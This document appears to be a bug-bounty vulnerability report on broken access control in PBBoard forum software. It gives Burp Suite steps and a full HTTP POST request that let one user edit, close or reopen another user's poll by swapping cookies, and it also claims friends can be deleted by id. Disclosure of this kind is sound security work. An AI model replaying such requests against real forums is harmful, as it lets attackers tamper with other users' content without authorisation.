Description

Unauthorized conduct by modifying, closing/re open a poll created by someone else. Delete friend of other account via id

Proof of Concept

Step 1: Use account 1 to create a poll

account 2 not have perrmison edit/close/open on poll
Step 2: Intercept request when account 1 edit, close, open a poll with burpsuite

Step 3: Change cookies account 2 to request of account 1

// PoC.js
POST /pbboard/index.php?page=vote&poll_start_edit=1&id=1&subject_id=8 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Origin: http://localhost
Connection: close
Referer: http://localhost/pbboard/index.php?page=vote&poll_edit=1&id=1&subject_id=8&poll_section=2&user=xss
Cookie: CHANGE COOKIE HERE
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

poll_answers_count=0&poll_answers_old=2&question=BAC_EDIT_POLL&answer%5B%5D=Answer+%231&answer%5B%5D=Answer+%231&insert=Edit

Step 4: Reload and view change
Reload on account 2
Reload on account 1

Impact

Once a flaw is discovered, the consequences of a flawed access control scheme can be devastating. In addition to viewing unauthorized content, an attacker might be able to change or delete content, perform unauthorized functions, or even take over site administration